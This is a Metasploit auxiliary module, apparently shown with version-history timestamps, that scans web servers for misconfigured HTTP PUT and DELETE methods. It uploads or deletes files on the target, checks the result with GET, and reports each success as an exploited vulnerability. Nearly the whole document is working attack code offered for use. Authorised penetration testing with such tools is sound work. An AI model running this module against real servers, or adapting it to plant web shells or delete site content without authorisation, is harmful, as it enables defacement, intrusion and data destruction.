2011-09-19 01:18:23 +00:00
|
|
|
##
|
|
|
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
2012-02-21 01:40:50 +00:00
|
|
|
# web site for more information on licensing and terms of use.
|
|
|
|
|
# http://metasploit.com/
|
2011-09-19 01:18:23 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
|
|
|
|
|
class Metasploit4 < Msf::Auxiliary
|
|
|
|
|
|
|
|
|
|
include Msf::Exploit::Remote::HttpClient
|
2012-02-20 22:28:19 +00:00
|
|
|
include Msf::Auxiliary::WmapScanDir
|
2011-09-19 01:18:23 +00:00
|
|
|
include Msf::Auxiliary::Scanner
|
|
|
|
|
include Msf::Auxiliary::Report
|
|
|
|
|
|
|
|
|
|
def initialize
|
|
|
|
|
super(
|
|
|
|
|
'Name' => 'HTTP Writable Path PUT/DELETE File Access',
|
|
|
|
|
'Description' => %q{
|
2011-09-19 20:36:09 +00:00
|
|
|
This module can abuse misconfigured web servers to upload and delete web content
|
|
|
|
|
via PUT and DELETE HTTP requests. Set ACTION to either PUT or DELETE.
|
|
|
|
|
|
|
|
|
|
PUT is the default. If filename isn't specified, the module will generate a
|
|
|
|
|
random string for you as a .txt file. If DELETE is used, a filename is required.
|
2011-09-19 01:18:23 +00:00
|
|
|
},
|
|
|
|
|
'Author' =>
|
|
|
|
|
[
|
2011-09-19 20:36:09 +00:00
|
|
|
'Kashif [at] compulife.com.pk',
|
|
|
|
|
'CG',
|
|
|
|
|
'sinn3r',
|
2011-09-19 01:18:23 +00:00
|
|
|
],
|
|
|
|
|
'License' => MSF_LICENSE,
|
2011-10-17 02:42:01 +00:00
|
|
|
'References' =>
|
2011-09-19 01:18:23 +00:00
|
|
|
[
|
|
|
|
|
[ 'OSVDB', '397'],
|
2011-09-19 20:36:09 +00:00
|
|
|
],
|
2011-09-19 01:18:23 +00:00
|
|
|
'Actions' =>
|
|
|
|
|
[
|
|
|
|
|
['PUT'],
|
|
|
|
|
['DELETE']
|
|
|
|
|
],
|
2011-09-19 20:36:09 +00:00
|
|
|
'DefaultAction' => 'PUT'
|
2011-09-19 01:18:23 +00:00
|
|
|
)
|
|
|
|
|
|
|
|
|
|
register_options(
|
|
|
|
|
[
|
2012-02-20 22:28:19 +00:00
|
|
|
OptString.new('PATH', [true, "The path to attempt to write or delete", "/"]),
|
|
|
|
|
OptString.new('FILENAME', [true, "The file to attempt to write or delete", "msf_http_put_test.txt"]),
|
|
|
|
|
OptString.new('FILEDATA', [false, "The data to upload into the file", "msf test file"]),
|
2011-09-19 20:36:09 +00:00
|
|
|
OptString.new('ACTION', [true, "PUT or DELETE", "PUT"])
|
2011-09-19 01:18:23 +00:00
|
|
|
], self.class)
|
|
|
|
|
end
|
|
|
|
|
|
2011-09-19 20:36:09 +00:00
|
|
|
#
|
2011-09-19 21:18:48 +00:00
|
|
|
# Send a normal HTTP request and see if we successfully uploaded or deleted a file.
|
2011-09-19 20:36:09 +00:00
|
|
|
# If successful, return true, otherwise false.
|
|
|
|
|
#
|
|
|
|
|
def file_exists(path, data)
|
|
|
|
|
begin
|
|
|
|
|
res = send_request_cgi(
|
|
|
|
|
{
|
|
|
|
|
'uri' => path,
|
|
|
|
|
'method' => 'GET',
|
|
|
|
|
'ctype' => 'text/plain',
|
|
|
|
|
'data' => data,
|
|
|
|
|
}, 20
|
|
|
|
|
).to_s
|
|
|
|
|
rescue ::Exception => e
|
|
|
|
|
print_error("Error: #{e.to_s}")
|
|
|
|
|
return nil
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
return (res =~ /#{data}/) ? true : false
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
#
|
|
|
|
|
# Do a PUT request to the server. Function returns the HTTP response.
|
|
|
|
|
#
|
|
|
|
|
def do_put(path, data)
|
|
|
|
|
begin
|
|
|
|
|
res = send_request_cgi(
|
|
|
|
|
{
|
2013-01-31 05:23:41 +00:00
|
|
|
'uri' => normalize_uri(path),
|
2011-09-19 20:36:09 +00:00
|
|
|
'method' => 'PUT',
|
|
|
|
|
'ctype' => 'text/plain',
|
|
|
|
|
'data' => data,
|
|
|
|
|
}, 20
|
|
|
|
|
)
|
|
|
|
|
rescue ::Exception => e
|
|
|
|
|
print_error("Error: #{e.to_s}")
|
|
|
|
|
return nil
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
return res
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
#
|
|
|
|
|
# Do a DELETE request. Function returns the HTTP response.
|
|
|
|
|
#
|
|
|
|
|
def do_delete(path)
|
|
|
|
|
begin
|
|
|
|
|
res = send_request_cgi(
|
|
|
|
|
{
|
2013-01-31 05:23:41 +00:00
|
|
|
'uri' => normalize_uri(path),
|
2011-09-19 20:36:09 +00:00
|
|
|
'method' => 'DELETE',
|
|
|
|
|
'ctype' => 'text/html',
|
|
|
|
|
}, 20
|
|
|
|
|
)
|
|
|
|
|
rescue ::Exception => e
|
|
|
|
|
print_error("Error: #{e.to_s}")
|
|
|
|
|
return nil
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
return res
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
#
|
|
|
|
|
# Main function for the module, duh!
|
|
|
|
|
#
|
2011-09-19 01:18:23 +00:00
|
|
|
def run_host(ip)
|
2013-01-31 05:23:41 +00:00
|
|
|
path = datastore['PATH']
|
2012-02-20 22:28:19 +00:00
|
|
|
data = datastore['FILEDATA']
|
2011-09-19 01:18:23 +00:00
|
|
|
|
2012-02-20 22:28:19 +00:00
|
|
|
if path[-1,1] != '/'
|
|
|
|
|
path += '/'
|
|
|
|
|
end
|
2012-06-06 05:22:36 +00:00
|
|
|
|
2012-03-18 05:07:27 +00:00
|
|
|
path += datastore['FILENAME']
|
2011-09-19 01:18:23 +00:00
|
|
|
|
|
|
|
|
case action.name
|
|
|
|
|
when 'PUT'
|
2011-09-19 20:36:09 +00:00
|
|
|
#Append filename if there isn't one
|
|
|
|
|
if path !~ /(.+\.\w+)$/
|
|
|
|
|
path << "#{Rex::Text.rand_text_alpha(5)}.txt"
|
|
|
|
|
vprint_status("No filename specified. Using: #{path}")
|
|
|
|
|
end
|
2011-11-20 02:12:07 +00:00
|
|
|
|
2011-09-19 20:36:09 +00:00
|
|
|
#Upload file
|
|
|
|
|
res = do_put(path, data)
|
2012-06-06 14:53:19 +00:00
|
|
|
vprint_status("Reply: #{res.code.to_s}") if not res.nil?
|
2011-09-19 20:36:09 +00:00
|
|
|
|
|
|
|
|
#Check file
|
|
|
|
|
if not res.nil? and file_exists(path, data)
|
2012-06-18 04:39:20 +00:00
|
|
|
turl = "#{(ssl ? 'https' : 'http')}://#{ip}:#{rport}#{path}"
|
|
|
|
|
print_good("File uploaded: #{turl}")
|
2011-09-19 20:36:09 +00:00
|
|
|
report_vuln(
|
|
|
|
|
:host => ip,
|
|
|
|
|
:port => rport,
|
|
|
|
|
:proto => 'tcp',
|
2012-06-18 04:39:20 +00:00
|
|
|
:name => self.name,
|
|
|
|
|
:info => "Module #{self.fullname} confirmed write access to #{turl} via PUT",
|
2011-09-19 20:36:09 +00:00
|
|
|
:refs => self.references,
|
2011-09-19 23:06:35 +00:00
|
|
|
:exploited_at => Time.now.utc
|
2011-09-19 20:36:09 +00:00
|
|
|
)
|
|
|
|
|
else
|
|
|
|
|
print_error("File doesn't seem to exist. The upload probably failed.")
|
2011-09-19 01:18:23 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
|
|
when 'DELETE'
|
2011-09-19 20:36:09 +00:00
|
|
|
#Check file before deleting
|
|
|
|
|
if path !~ /(.+\.\w+)$/
|
|
|
|
|
print_error("You must supply a filename")
|
|
|
|
|
return
|
|
|
|
|
elsif not file_exists(path, data)
|
|
|
|
|
print_error("File is already gone. Will not continue DELETE")
|
|
|
|
|
return
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
#Delete our file
|
|
|
|
|
res = do_delete(path)
|
2012-06-06 14:53:19 +00:00
|
|
|
vprint_status("Reply: #{res.code.to_s}") if not res.nil?
|
2011-09-19 20:36:09 +00:00
|
|
|
|
|
|
|
|
#Check if DELETE was successful
|
|
|
|
|
if res.nil? or file_exists(path, data)
|
|
|
|
|
print_error("DELETE failed. File is still there.")
|
|
|
|
|
else
|
2012-06-18 04:39:20 +00:00
|
|
|
turl = "#{(ssl ? 'https' : 'http')}://#{ip}:#{rport}#{path}"
|
|
|
|
|
print_good("File deleted: #{turl}")
|
2011-09-19 20:36:09 +00:00
|
|
|
report_vuln(
|
|
|
|
|
:host => ip,
|
|
|
|
|
:port => rport,
|
|
|
|
|
:proto => 'tcp',
|
2012-02-18 04:59:48 +00:00
|
|
|
:sname => (ssl ? 'https' : 'http'),
|
2012-06-18 04:39:20 +00:00
|
|
|
:name => self.name,
|
|
|
|
|
:info => "Module #{self.fullname} confirmed write access to #{turl} via DELETE",
|
2011-09-19 20:36:09 +00:00
|
|
|
:refs => self.references,
|
|
|
|
|
:exploited_at => Time.now.utc
|
|
|
|
|
)
|
2011-09-19 01:18:23 +00:00
|
|
|
end
|
|
|
|
|
end
|
|
|
|
|
end
|
2011-09-19 20:36:09 +00:00
|
|
|
|
2011-09-19 01:18:23 +00:00
|
|
|
end
|
